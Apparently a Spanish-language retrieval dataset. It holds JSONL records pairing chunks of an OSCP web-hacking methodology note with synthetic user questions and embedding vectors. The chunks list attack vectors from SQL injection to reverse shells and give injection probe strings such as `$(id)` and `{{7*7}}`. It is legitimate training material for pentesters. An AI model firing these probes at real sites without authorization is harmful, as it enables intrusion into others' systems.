-0.02425, 0.0557, 0.01715, 0.02919, 0.01209, -0.06979, -0.03066, 0.09538, -0.03269, -0.03928, 0.03698, 0.04631, -0.01547, 0.00778, -0.04701, -0.12255, 0.03464, -0.0348, 0.01444, -0.01867, -0.02309, -0.04418, -0.02569, -0.03633, -0.02942, 0.06091, 0.0009, -0.00129, 0.00053, 0.01603, -0.03953, -0.00893, -0.03415, -0.01073, -0.03881, -0.00516, -0.00819, -0.00622, 0.06294, 0.0582]} +{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Hacking web (metodologΓ­a)\n\n> CΓ³mo atacar una web paso a paso. En el OSCP, la web es el **foothold** mΓ‘s comΓΊn de las mΓ‘quinas standalone. Sub-Γ­ndice de EnumeraciΓ³n dentro de la MetodologΓ­a OSCP.", "indexar": "que herramienta me sirve para atacar una web paso a paso como en el OSCP?", "v": [0.01197, 0.01089, -0.1582, -0.14074, -0.09079, -0.20091, 0.00264, -0.04722, -0.01085, 0.03885, -0.0041, -0.09257, -0.03148, -0.029, 0.06937, 0.01259, 0.06419, 0.05173, 0.09015, 0.0621, -0.06702, 0.04531, -0.0885, -0.00358, -0.00885, 0.04425, 0.05065, -0.02987, -0.24932, -0.01993, -0.06913, 0.08648, -0.00164, -0.02051, -0.02342, -0.07516, -0.09379, -0.04426, 0.07159, 0.14872, -0.07767, 0.04378, -0.07725, 0.11854, 0.06111, -0.01225, 0.05367, 0.04099, 0.06639, 0.04872, -0.02328, -0.14767, -0.19606, 0.0132, -0.0611, -0.02205, 0.15718, -0.1153, 0.01547, -0.08352, -0.14869, 0.05028, -0.04496, -0.12023, 0.02717, -0.09336, -0.08846, -0.01803, -0.11776, 0.08272, -0.01974, 0.14419, 0.01828, -0.00049, -0.00264, -0.0853, 0.05296, 0.06927, 0.16002, 0.02713, 0.10475, -0.06302, -0.07808, 0.08776, -0.08484, -0.05575, 0.1309, -0.04206, 0.02537, -0.12864, -0.00959, 0.1228, -0.00391, -0.00222, -0.04114, -0.04513, 0.01854, -0.05145, 4e-05, -0.04761, 0.06583, -0.01574, -0.15593, 0.02408, -0.02874, 0.03068, 0.05611, -0.04147, -0.04108, -0.07063, 0.04073, 0.01869, 0.02323, -0.02611, 0.02642, 0.00136, -0.0181, -0.0623, -0.03589, -0.05855, -0.04274, 0.06958, -0.0727, -0.02142, -0.04907, 0.08302, -0.02137, 0.01339, -0.03502, -0.09848, -0.0289, -0.08199, -0.04916, 0.0534, -0.04942, -0.05702, 0.02049, -0.14676, -0.00602, -0.00041, 0.04206, 0.09702, -0.06742, -0.04422, 0.00158, -0.01562, 0.0295, -0.01053, -0.07395, -0.01911, -0.02156, -0.05133, -0.00521, 0.0571, -0.09342, -0.03499, -0.07283, 0.03106, -0.07611, 0.08062, -0.08028, -0.01957, 0.00917, 0.04395, -0.02214, -0.01052, -0.01258, -0.00123, 0.07801, 0.01228, 0.05546, 0.03117, 0.03952, -0.0255, 0.02469, -0.05407, -0.05447, -0.0106, 0.02497, -0.01642, -0.03958, -0.03806, -0.0102, 0.0314, -0.01988, -0.03067, -0.00299, 0.0161, 0.00285, 0.06858, -0.01305, -0.00379, 0.00793, -0.0355, 0.02037, -0.00189, -0.02939, -0.04879, 0.04346, -0.01126, -0.0377, -0.07955, -0.02846, -0.04793, 0.01269, 0.06938, 0.01118, -0.00583, -0.02785, 0.03908, 0.01134, -0.01569, 0.07341, -0.01354, -0.01627, -0.02931, 0.04803, 0.05369, -0.03683, 0.0126, 0.08715, 0.00797, 0.02546, -0.01009, 0.02071, 0.04812, -0.01556, -0.06497, 0.0064, -0.00104, -0.00353, -0.09864, 0.01608, -0.03657, 0.0086, -0.04863, 0.00112, -0.00451, -0.11242, -0.01319, -0.01095, 0.01415, 0.04, -0.00934, -0.0237, -0.06092, -0.03751, -0.05554, -0.03059, -0.05121, -0.04787, -0.0298, 0.06567, 0.00363, 0.0207, 0.03125]} +{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## El flujo\n```\n1. ENUMERAR β†’ EnumeraciΓ³n web + Content discovery + Vhosts y subdominios\n2. MAPEAR superficie β†’ cada input es un test: URL, params GET/POST, headers,\n cookies, formularios, uploads, JSON/API. Mapea con Burp Suite.\n3. IDENTIFICAR tecnologΓ­a β†’ whatweb, wappalyzer, headers, errores β†’ searchsploit del CMS\n4. PROBAR cada vector (uno a uno):\n SQL injection (login, params, search)\n Command injection (params que ejecutan algo: ping, convert, export)\n Directory traversal (file=, path=, download=, page=)\n LFI a RCE / RFI (include de ficheros)\n File upload bypass (avatar, documento, import)\n XSS (reflejo en la pΓ‘gina)\n SSTI ({{7*7}} en plantillas)\n Authentication attacks (default creds, fuerza bruta, bypass)\n5. EXPLOTAR β†’ de RCE a Reverse shell β†’ luego Privesc Linux / Privesc Windows\n```", "indexar": "que herramienta me sirve para hacer un mapeo inicial de una URL incluyendo inputs y headers?", "v": [0.10405, 0.19687, -0.18598, -0.10949, 0.06347, -0.14283, -0.09667, -0.07507, -0.03041, -0.04714, -0.10211, -0.08184, 0.10348, -0.1416, 0.05936, 0.11391, 0.08694, -0.0909, 0.01003, -0.06445, -0.01204, 0.11128, -0.14943, 0.03637, -0.19545, -0.03867, -0.00505, -0.03171, -0.20342, -0.02369, 0.03216, 0.03827, -0.0189, -0.11321, -0.1854, -0.17643, -0.03776, 0.07697, -0.07565, 0.10834, -0.07272, 0.08297, -0.19866, 0.06575, 0.01009, 0.02282, 0.00657, 0.05599, 0.04565, 0.0913, 0.0055, -0.11304, -0.18359, 0.00659, -0.06688, -0.07587, 0.14348, -0.12006, 0.0404, -0.11915, -0.13201, 0.02201, -0.0198, -0.02357, -0.04009, -0.01259, -0.05196, -0.08005, 0.00421, 0.07493, -0.06662, 0.11667, 0.09118, -0.10956, 0.00514, -0.00938, 0.00572, 0.01614, 0.07968, 0.04526, 0.00051, -0.05446, -0.09408, 0.02951, -0.0248, -0.05122, 0.03233, -0.01158, 0.0799, -0.04384, 0.00982, 0.08109, -0.02679, 0.05272, -0.0595, -0.00297, -0.01493, -0.01048, 0.00904, -0.00427, 0.08763, -0.05673, -0.11642, 0.09635, 0.02394, 0.04428, 0.04369, -0.02435, -0.04776, 0.03921, 0.04674, 0.08664, -0.01963, -0.01037, -0.03615, 0.00839, 0.00573, -0.0266, 0.00573, -0.10196, -0.02541, 0.00379, -0.02242, 0.0062, -0.03356, 0.03685, -0.03067, 0.05567, 0.0774, 0.01404, 0.0225, -0.00462, -0.04061, 0.03283, -0.04506, 0.01787, 0.04947, -0.03495, 0.00099, 0.01204, -0.03152, 0.065, 0.00338, -0.08505, 0.01645, 0.0134, -0.00028, -0.02215, -0.05369, -0.00036, -0.00556, 0.02068, -0.00112, 0.00586, -0.01975, -0.02729, -0.01543, 0.01363, -0.05944, 0.03424, 0.00343, 0.01512, 0.03065, 0.04175, 0.04393, -0.04549, -0.01451, -0.00863, 0.05293, 0.08216, -0.02264, 0.06246, 0.04457, -0.05303, -0.0364, -0.00636, -0.05088, 0.01188, 0.00682, -0.0184, -0.00023, -0.00825, -0.01867, 0.02884, -0.02954, -0.02459, 0.04826, -0.05336, -0.02384, 0.02668, -0.05978, 0.06483, -0.01027, -0.06179, 0.04102, -0.03615, -0.02626, -0.02741, -0.03913, -0.02165, -0.03716, -0.00549, -0.0252, -0.05323, 0.00989, 0.07864, -0.03362, -0.02471, -0.02721, 0.04867, -0.00289, -0.00057, 0.07161, 0.01857, -0.03148, -0.04745, 0.06868, 0.01277, -0.00301, 0.01177, 0.01336, 0.01838, 0.04114, -0.00108, 0.02764, -0.01134, 0.04951, -0.01287, -0.02539, -0.01563, 0.04626, -0.04328, -0.01453, -0.04839, 0.04533, -0.06843, -0.00139, -0.06099, -0.00633, -0.01322, 0.04393, 0.00519, -0.02638, -0.00613, -0.00903, -0.0229, 0.06742, -0.02841, -0.01754, -0.0627, -0.06139, -0.02689, 0.08766, 0.01236, 0.04891, -0.03771]} +{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## El flujo\n```\n1. ENUMERAR β†’ EnumeraciΓ³n web + Content discovery + Vhosts y subdominios\n2. MAPEAR superficie β†’ cada input es un test: URL, params GET/POST, headers,\n cookies, formularios, uploads, JSON/API. Mapea con Burp Suite.\n3. IDENTIFICAR tecnologΓ­a β†’ whatweb, wappalyzer, headers, errores β†’ searchsploit del CMS\n4. PROBAR cada vector (uno a uno):\n SQL injection (login, params, search)\n Command injection (params que ejecutan algo: ping, convert, export)\n Directory traversal (file=, path=, download=, page=)\n LFI a RCE / RFI (include de ficheros)\n File upload bypass (avatar, documento, import)\n XSS (reflejo en la pΓ‘gina)\n SSTI ({{7*7}} en plantillas)\n Authentication attacks (default creds, fuerza bruta, bypass)\n5. EXPLOTAR β†’ de RCE a Reverse shell β†’ luego Privesc Linux / Privesc Windows\n```", "indexar": "con que programa puedo probar vectores como SQL injection, directory traversal o comandos en tiempo real?", "v": [0.16075, -0.04272, -0.1764, -0.11779, 0.00527, -0.10842, 0.15264, -0.12054, 0.04008, -0.04912, -0.02394, -0.08735, 0.05399, -0.17244, -0.02566, 0.12572, 0.12674, -0.15344, -0.06337, 0.02213, 0.1377, -0.12123, -0.04267, -0.01949, 0.01928, 0.06116, 0.02591, 0.04556, -0.02007, -0.08481, -0.09247, -0.02356, 0.08885, -0.09336, -0.07304, -0.04572, -0.02528, 0.04815, -0.02542, 0.04009, 0.00301, 0.0179, -0.14298, 0.04158, 0.07528, -0.04968, 0.05391, -0.01729, -0.09432, -0.1511, -0.0376, 0.01159, -0.09349, 0.03197, -0.02982, -0.07927, 0.05799, -0.02248, 0.04071, 0.05022, -0.05688, -0.04104, 0.05383, 0.06448, 0.02104, -0.0582, 0.04283, -0.11718, -0.07876, 0.07045, -0.14441, 0.03144, -0.03748, -0.04205, 0.03268, -0.01515, 0.03849, -0.01344, 0.0418, -0.05306, -0.09254, -0.05003, -0.02659, 0.15721, -0.0106, -0.0841, 0.05297, -0.07369, 0.02899, -0.08267, 0.03883, 0.00088, 0.04215, 0.05755, 0.07609, 0.02749, 0.05001, -0.06119, 0.09405, 0.03842, -0.0125, -0.04223, -0.15139, 0.19441, 0.05572, 0.08866, 0.09007, -0.06252, -0.01021, -0.00274, 0.0314, -0.07069, -0.06705, -0.08458, -0.00771, -0.021, -0.00951, -0.01047, -0.01962, -0.04573, -0.12287, -0.00017, -0.04627, 0.11215, -0.02536, -0.01669, -0.0577, 0.00505, -0.01647, 0.06272, -0.02207, 0.04756, -0.0333, -0.03645, -0.1123, 0.04281, 0.01634, -0.03682, -0.01456, -0.12272, -0.00804, 0.0509, 0.05017, -0.04487, -0.01333, -0.01104, -0.02923, -0.07936, -0.07426, 0.01089, 0.03151, 0.05403, 0.04163, 0.10387, -0.04586, -0.05808, 0.0621, -0.00399, -0.05482, 0.0556, -0.01598, 0.087, -0.06456, -0.02537, 0.01603, -0.06609, -0.03514, -0.01587, 0.07486, 0.05851, -0.0292, 0.08278, 0.03584, -0.05236, 0.00428, 0.0008, -0.03137, -0.08338, 0.1022, -0.04214, -0.00164, 0.04215, -0.03901, -0.01086, -0.00251, -0.0656, -0.02539, 0.0772, 0.04458, 0.00835, 0.0356, 0.03479, -0.01028, -0.01836, -0.01879, -0.01623, 0.02277, 0.00076, 0.00155, -0.06693, -0.05121, -0.00057, -0.02465, -0.05513, 0.00591, 0.0798, -0.06853, 0.09329, 0.01559, 0.03958, 0.00066, -0.02034, 0.044, 0.03026, -0.01907, -0.03956, 0.00965, 0.00446, -0.00927, 0.0066, -0.00102, 0.02243, 0.06153, -0.01243, -0.03267, -0.06638, -0.00065, 0.01719, 0.03851, 0.04863, -0.01863, -0.00448, -0.00502, -0.04229, 0.07403, 0.04962, -0.00922, -0.00956, -0.02316, -0.07447, 0.02115, 0.08705, -0.02393, -0.03098, -0.05226, -0.03586, -0.12422, -0.02598, -0.00437, -0.0172, -0.03951, 0.05984, 0.06176, -0.07693, 0.00484, -0.0185]} +{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## El flujo\n```\n1. ENUMERAR β†’ EnumeraciΓ³n web + Content discovery + Vhosts y subdominios\n2. MAPEAR superficie β†’ cada input es un test: URL, params GET/POST, headers,\n cookies, formularios, uploads, JSON/API. Mapea con Burp Suite.\n3. IDENTIFICAR tecnologΓ­a β†’ whatweb, wappalyzer, headers, errores β†’ searchsploit del CMS\n4. PROBAR cada vector (uno a uno):\n SQL injection (login, params, search)\n Command injection (params que ejecutan algo: ping, convert, export)\n Directory traversal (file=, path=, download=, page=)\n LFI a RCE / RFI (include de ficheros)\n File upload bypass (avatar, documento, import)\n XSS (reflejo en la pΓ‘gina)\n SSTI ({{7*7}} en plantillas)\n Authentication attacks (default creds, fuerza bruta, bypass)\n5. EXPLOTAR β†’ de RCE a Reverse shell β†’ luego Privesc Linux / Privesc Windows\n```", "indexar": "que software ayuda a identificar la tecnologΓ­a del servidor antes de empezar a explotar vulnerabilidades?", "v": [0.10256, 0.07911, -0.17941, -0.2234, 0.01195, -0.11478, -0.05039, -0.12342, 0.0379, -0.03551, -0.1078, -0.13398, -0.00067, 0.0191, 0.01045, -0.01113, 0.10909, -0.16045, 0.07325, 0.01484, 0.038, 0.01247, -0.04718, -0.10598, -0.04439, 0.0104, -0.07544, -0.0708, -0.10848, -0.00849, -0.05734, -0.11508, 0.0262, -0.01697, -0.08903, 0.03822, -0.00382, 0.04066, 0.02175, 0.07666, 0.05154, -0.00595, -0.00185, 0.04283, 0.20175, -0.02645, 0.01166, -0.07821, 0.10639, -0.00348, -0.0609, -0.088, -0.14328, -0.11436, 0.04634, -0.02901, 0.15097, -0.10782, 0.01255, -0.04021, -0.14736, 0.04598, -0.01021, -0.05922, 0.08862, -0.0231, -0.01664, -0.04563, -0.1352, 0.06399, -0.01115, 0.00507, -0.01968, -0.03073, 0.03096, -0.01011, -0.0244, -0.00988, 0.06669, 0.00637, -0.00542, 0.08743, -0.01405, 0.08423, -0.13214, -0.15074, 0.09387, 0.04844, 0.06463, -0.09523, 0.09282, 0.07043, -0.07118, 0.03176, 0.08584, 0.02792, 0.16454, -0.02807, -0.01558, 0.10371, -0.04995, -0.05058, -0.04139, 0.09448, 0.04187, 0.06032, 0.03105, -0.10436, 0.0011, -0.11324, -0.022, 0.00695, -0.01956, -0.02573, -0.06965, -0.04614, 0.03242, -0.08747, 0.01488, 0.00012, -0.03969, -0.0677, 0.03184, -0.00643, 0.05556, -0.04649, 0.03177, 0.06459, 0.0226, -0.07381, -0.02986, -0.05652, -0.02432, 0.05109, -0.00398, 0.06975, 0.09072, -0.0694, -0.03848, -0.02607, 0.04869, 0.02964, -0.04106, -0.00634, 0.09589, 0.01446, 0.08986, -0.05801, -0.07349, 0.02771, 0.03379, -0.00941, -0.05939, 0.0197, -0.14658, -0.04342, -0.00817, 0.00841, -0.04403, 0.04391, -0.00799, 0.06986, 0.00811, 0.01412, -0.01071, -0.03786, 0.04848, 0.04671, 0.08617, 0.07039, -0.02296, 0.05284, 0.07626, 0.00603, -0.01481, -0.05974, -0.00624, -0.05117, -0.04731, -0.04971, -0.08872, -0.03457, 0.00789, -0.01615, -0.01065, -0.01041, -0.0449, -0.03151, -0.0104, 0.04397, 0.02189, 0.0013, -0.02214, 0.06852, 0.07919, -0.06174, -0.03759, -6e-05, -0.0074, -0.03161, -0.05728, -0.0004, -0.0558, -0.04951, 0.03544, 0.05168, -0.04438, 0.0026, -0.0406, 0.02624, 0.00263, -0.00108, 0.10985, -0.01135, -0.0748, -0.04106, 0.04393, 0.01386, -0.04175, -0.04922, 0.01465, 0.00233, 0.02696, 0.03412, -0.00138, 0.04691, 0.03434, 0.02575, 0.04288, -0.01094, -0.00568, -0.00388, -0.03552, -0.03181, 0.02866, -0.01842, 0.05557, -0.04767, -0.0659, -0.04739, 0.02734, 0.06292, 0.01354, -0.08561, -0.01379, -0.04993, -0.06623, -0.0258, -0.01161, -0.02668, -0.02257, 0.03745, 0.07353, -0.07198, 0.02742, -0.03228]} +{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## La regla de oro web\n**Todo input es sospechoso.** Por cada parΓ‘metro, prueba: comilla `'`, `<`, `;`, `../`, `{{7*7}}`, `$(id)`. La pΓ‘gina te dice por su reacciΓ³n quΓ© vector hay.", "indexar": "que programa me ayuda a probar si los inputs de una web son sospechosos?", "v": [0.25889, 0.2493, -0.13201, -0.12424, -0.01145, -0.07406, -0.02298, -0.08969, 0.03972, -0.10766, -0.06872, 0.02507, 0.06834, -0.11397, -0.10334, -0.05665, 0.08671, -0.05625, 0.04628, 0.05876, 0.11675, -0.024, -0.12682, -0.07168, -0.03216, -0.05732, 0.01129, 0.05089, -0.01421, -0.00633, -0.08823, -0.08581, 0.03543, -0.0123, -0.1314, -0.01962, 0.01363, -0.02192, 0.13563, 0.10436, 0.01627, -0.09899, -0.01141, -0.03093, 0.02632, 0.05836, -0.05457, -0.06855, -0.03289, -0.01287, -0.05322, -0.04924, -0.0217, -0.02929, -0.04774, -0.14384, 0.03913, -0.17627, -0.0225, -0.05422, -0.04075, -0.01958, 0.00041, -0.00903, 0.0953, -0.01184, 0.07025, 0.00893, -0.04168, 0.00494, -0.02483, 0.054, 0.00842, -0.02962, -0.02861, -0.045, -0.00596, -0.03929, 0.12975, -0.08583, -0.03994, 0.00584, 0.07217, 0.10562, -0.03757, -0.07852, 0.01431, -0.03499, -0.06679, -0.04115, 0.06788, 0.01175, 0.0453, 0.08385, 0.02432, -0.01343, 0.19236, -0.03634, 0.06734, -0.05406, 0.04468, -0.15443, -0.13594, 0.09906, -0.0328, 0.06654, 0.05057, 0.00845, -0.09067, 0.02874, -0.03794, -0.00925, -0.11927, -0.0417, -0.11036, -0.01958, 0.03965, -0.01422, 0.00692, -0.11762, -0.04962, 0.0574, -0.06197, 0.00438, -0.00411, 0.00042, -0.06677, 0.02556, 0.06249, 0.09891, 0.02432, 0.02735, -0.03542, -0.02118, 0.00205, -0.04282, -0.01413, -0.01956, -0.0109, 0.02728, 0.03375, 0.03247, 0.06748, -0.04017, 0.04507, -0.03219, -0.0011, -0.00946, -0.06918, 0.00557, -0.04445, 0.04124, 0.00773, 0.06292, -0.11726, -0.01326, -0.00049, -0.04283, -0.03212, 0.02172, -0.07093, 0.05956, 0.01032, -0.03925, 0.04963, -0.01483, -0.03012, -0.03207, 0.0504, 0.03719, -0.06005, 0.09443, -0.00654, -0.04832, -0.00774, 0.01037, -0.0307, -0.08856, -0.00896, -0.04775, -0.09262, 0.04481, 0.06076, 0.0496, 1e-05, -0.0582, -0.01886, -0.01545, -0.03054, -0.00457, -0.0027, 0.06066, -0.08207, 0.0207, -0.01985, 0.01412, -0.03879, 0.01231, 0.0681, -0.04243, -0.05533, -0.03425, 0.00066, -0.04369, -0.03629, 0.10469, -0.07284, -0.01666, 0.05978, 0.07879, 0.02867, -0.03671, 0.08945, 0.00948, -0.03405, -0.04331, -0.00211, -0.00092, -0.01348, 0.03215, -0.00315, 0.0133, 0.05536, 0.08342, 0.02621, -0.01513, 0.07428, 0.07115, 0.02853, -0.03266, -0.00946, -0.08599, -0.03166, -0.09081, 0.00895, -0.00923, -0.00151, -0.03706, -0.07271, -0.06369, -0.01247, 0.08519, -0.03717, -0.0747, 0.03606, -0.00964, -0.08257, -0.006, -0.00965, -0.04184, -0.00331, 0.05858, 0.04249, -0.05935, 0.06249, 0.01036]} +{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## La regla de oro web\n**Todo input es sospechoso.** Por cada parΓ‘metro, prueba: comilla `'`, `<`, `;`, `../`, `{{7*7}}`, `$(id)`. La pΓ‘gina te dice por su reacciΓ³n quΓ© vector hay.", "indexar": "con que herramienta puedo identificar vectores de ataque probando reacciones en pΓ‘ginas web?", "v": [0.17347, 0.13469, -0.19709, -0.17579, 0.02109, 0.00706, 0.03231, -0.03681, 0.04235, -0.072, 0.07926, -0.07414, -0.07386, -0.05736, 0.15783, 0.12424, 0.06616, -0.04988, 0.03473, -0.07523, 0.05009, -0.13434, -0.05867, -0.02716, -0.02043, 0.09575, -0.04309, 0.10766, 0.03073, -0.01277, -0.05039, -0.01624, 0.08499, -0.04889, -0.1742, 0.03518, -0.05496, 0.04771, 0.06773, 0.11674, -0.03721, -0.01846, -0.16326, -0.03136, 0.06731, 0.03397, -0.06072, -0.08409, -0.04027, 0.01537, -0.01544, -0.01658, -0.18704, 0.00174, -0.0708, -0.13839, 0.22179, -0.02169, 0.07159, -0.05104, -0.05599, 0.08951, 0.01621, -0.09964, 0.00379, -0.04686, -0.0206, -0.01309, -0.04908, 0.03424, -0.03195, 0.054, 0.05064, -0.05834, 0.06474, 0.04487, 0.03062, 0.10436, 0.05319, 1e-05, -0.03103, -0.03631, -0.11523, 0.02832, -0.04099, -0.05305, 0.00488, -0.10911, 0.02713, -0.09396, -0.02167, 0.00749, -0.01746, -0.07291, -0.0629, -0.03173, 0.06858, -0.0869, 0.08978, 0.0, 0.04526, -0.04312, -0.11762, 0.01154, 0.03478, -0.01965, -0.0604, -0.03101, -0.02339, -0.09593, 0.05286, -0.06191, -0.08002, -0.08989, -0.03742, 0.02754, -0.02388, 0.00204, 0.0393, -0.07016, -0.07489, 0.01912, -0.08231, 0.02333, -0.02518, 0.05571, -0.03849, -0.01239, -0.04572, -0.02806, -0.03934, -0.02901, -0.05139, -0.02205, -0.00171, 0.05957, -0.00678, -0.1317, 0.00221, -0.09317, 0.00095, 0.02062, -0.02201, -0.08875, 0.02872, 2e-05, -0.03213, -0.01605, -0.13686, 0.07257, -0.00183, -0.00011, 0.04883, 0.08011, -0.06539, -0.02468, -0.02693, 0.01563, -0.04246, 0.02144, -0.03867, 0.04388, 0.01402, 0.06723, 0.02338, -0.02201, -0.06655, -0.0464, 0.11779, 0.05413, 0.01907, 0.00856, 0.00905, -0.06127, 0.04113, -0.03339, -0.11833, -0.01494, 0.07444, -0.02643, 0.01761, -0.03499, -0.04104, -0.0323, -0.01062, -0.05445, 0.07781, 0.00547, 0.04298, 0.02759, 0.0072, 0.06773, -0.04447, 0.02415, 0.04862, -0.0202, -0.01851, 0.01195, 0.02579, -0.03684, -0.01219, -0.02702, -0.06906, -0.03153, 0.01574, 0.10781, -0.0581, -0.0222, -0.0386, 0.00723, 0.01062, -0.02871, 0.10538, -0.06717, -0.03966, -0.0201, 0.05448, -0.01228, -0.03009, -0.00709, 0.09564, 0.05129, 0.01091, 0.05808, 0.0237, 0.01767, -0.01566, -0.0478, 0.03958, 0.05058, -0.00343, -0.06885, 0.0116, -0.0387, 0.03908, -0.05706, 0.09391, 0.00222, -0.1087, -0.00333, -0.00339, 0.01983, -0.01168, -0.01596, -0.02783, -0.08178, -0.04577, -0.0057, 0.00198, -0.01451, -0.05002, 0.00412, 0.06864, -0.01907, 0.05454, -0.02437]} +{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Herramientas\n- Burp Suite (intercepta y manipula TODO) + Burp Repeater e Intruder\n- Content discovery (gobuster/feroxbuster/ffuf)\n- `nikto`, `whatweb`, `wpscan`, `cmsmap` β†’ EnumeraciΓ³n web\n\nRelacionado: Recursos pΓΊblicos (PayloadsAllTheThings, HackTricks) Β· OSCP MOC", "indexar": "quΓ© herramienta me sirve para interceptar y manipular el trΓ‘fico de una aplicaciΓ³n", "v": [0.06165, 0.11734, -0.13526, -0.29101, 0.0849, -0.06066, -0.10202, 0.08215, 0.03894, 0.03678, -0.02755, -0.11539, 0.0615, -0.00852, 0.07508, 0.04924, 0.0022, -0.11122, 0.02641, -0.02606, 0.01918, 0.06435, -0.05902, -0.12869, -0.08473, 0.00798, -0.08975, -0.03037, -0.23203, -0.03016, -0.09767, 0.00508, 0.12481, -0.01321, -0.09211, -0.11787, -0.02827, -0.00041, 0.04163, 0.02759, 0.05581, -0.04378, -0.13531, -0.01687, 0.05035, 0.04496, -0.06724, -0.01221, -0.09887, 0.04778, 0.00794, -0.14008, -0.1337, -0.01238, -0.06353, -0.07093, 0.13035, -0.13886, 0.05539, -0.04008, -0.05744, 0.03863, -0.04355, -0.01934, 0.02496, -0.07576, 0.02778, 0.01697, -0.10625, 0.03593, 0.02227, 0.12345, 0.05857, 0.12269, 0.08057, -0.02354, -0.01166, 0.05972, 0.05717, 0.00496, 0.03129, 0.0041, -0.12648, 0.06483, 0.00048, -0.0073, 0.09999, -0.07591, 0.02244, -0.05375, -0.0507, 0.08788, -0.00721, -0.05361, 0.09485, 0.00401, -0.04724, -0.0368, 0.04746, 0.02352, 0.20748, -0.06184, -0.1318, -0.02887, -0.0204, 0.01383, -0.03117, -0.03944, -0.03191, 0.0254, -0.01717, -0.00676, 0.02934, 0.04238, -0.0142, 0.03422, 0.01907, -0.04309, -0.0393, -0.11772, -0.03651, 0.01486, -0.05229, -0.08556, 0.06084, -0.01416, -0.00368, 0.12102, 0.0108, -0.06633, -0.02249, -0.05682, -0.10102, -0.00256, 0.01664, -0.08869, 0.01502, -0.11911, -0.02524, 0.01785, 0.03978, -0.01289, 0.01493, -0.03911, -0.00385, 0.03508, 0.05179, -0.00489, 0.00287, -0.03982, 0.07648, -0.18805, -0.05814, -0.01222, 0.01265, 0.01214, -0.00664, -0.06601, -0.06629, 0.01594, -0.05862, -0.02637, -0.01712, 0.01444, 0.02808, -0.06154, 0.03239, -0.00143, 0.05458, 0.02489, 0.02814, -0.01404, 0.08485, -0.06302, -0.01183, -0.08326, -0.04589, 0.05202, 0.01568, -0.11634, -0.02677, 0.00467, 0.04223, 0.01538, 0.04164, -0.02107, -0.01714, 0.01406, -0.01147, 0.02085, -0.00124, 0.07856, 0.02015, -0.07789, -0.01709, 0.00125, 0.02541, -0.0285, 0.05737, 0.00154, 0.04247, -0.0899, 0.02945, -0.01591, -0.00804, 0.02334, 0.01749, -0.04742, 0.04096, 0.07809, 0.00762, 0.04607, 0.02237, 0.00948, 0.01503, -0.04224, 0.01251, 0.04641, 0.00777, 0.01489, -0.00785, -0.02644, -0.00866, -0.0037, -0.06742, 0.06008, -0.02375, 0.02275, 0.0296, 0.01569, 0.0179, -0.04839, -0.02299, -0.00667, -0.01343, -0.05124, -0.0095, -0.03161, -0.05898, -0.07636, -0.01069, 0.01171, 0.01346, -0.05904, -0.02704, -0.04082, 0.00872, -0.03635, -0.00518, -0.06126, -0.04838, 0.03682, 0.06858, -0.03207, 0.06114, -0.03382]} +{"tipo": "pregunta", "herramienta": "Hacking web", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Herramientas\n- Burp Suite (intercepta y manipula TODO) + Burp Repeater e Intruder\n- Content discovery (gobuster/feroxbuster/ffuf)\n- `nikto`, `whatweb`, `wpscan`, `cmsmap` β†’ EnumeraciΓ³n web\n\nRelacionado: Recursos pΓΊblicos (PayloadsAllTheThings, HackTricks) Β· OSCP MOC", "indexar": "con quΓ© puedo hacer descubrimiento de contenido en un sitio web", "v": [0.05366, 0.08677, -0.15121, 0.02031, 0.06027, -0.0505, -0.00432, -0.05014, -0.02987, -0.12766, -0.05719, -0.05189, -0.06177, 0.04217, 0.01954, 0.05709, 0.18058, -0.0333, 0.05783, -0.09112, 0.02941, -0.10111, -0.09188, -0.0844, 0.01611, -0.11419, 0.04351, 0.06122, -0.00568, 0.04102, -0.0012, 0.10078, -0.02405, 0.12947, -0.10524, 0.05097, 0.09136, -0.00188, -0.04268, -0.09922, -0.07389, -0.06488, -0.04313, 0.08491, -0.13501, 0.01794, -0.02458, -0.13032, -0.05644, -0.05418, 0.03486, -0.0456, -0.13563, -0.06143, 0.01649, 0.03253, 0.12262, -0.08428, 0.12151, 0.02922, -0.07948, -0.00707, -0.03536, -0.01425, -0.04541, -0.06551, -0.02944, 0.17401, 0.05239, 0.01826, 0.04631, -0.08769, 0.08391, -0.04907, 0.06165, 0.0517, -0.03676, 0.02825, -0.0017, 0.01825, 0.02131, 0.0489, 0.01945, -0.0112, -0.07843, -0.08323, -0.03319, -0.11293, -0.02056, -0.17803, 0.06773, 0.09211, -0.08846, 0.09655, -0.08377, -0.10411, 0.08673, -0.05221, -0.04814, 0.04906, 0.01723, 0.00466, -0.05466, 0.03139, 0.07585, 0.11506, 0.04757, -0.00661, -0.02603, -0.10586, 0.08579, -0.05497, -0.13976, -0.06671, -0.12246, 0.12066, 0.02926, -0.00073, -0.02318, -0.1015, -0.1096, -0.01128, -0.01676, -0.01009, -0.04028, -0.02286, 0.00869, 0.08024, 0.02311, -0.10002, 0.04414, -0.04238, -0.02727, 0.00266, 0.04764, 0.00441, -0.02207, 0.0036, 0.02252, 0.04279, 0.09841, -0.09546, -0.0678, -0.00261, 0.03296, -0.04687, 0.06173, 0.02595, -0.14866, -0.0079, -0.11961, 0.02692, -0.05776, 0.00994, -0.00265, 0.02976, 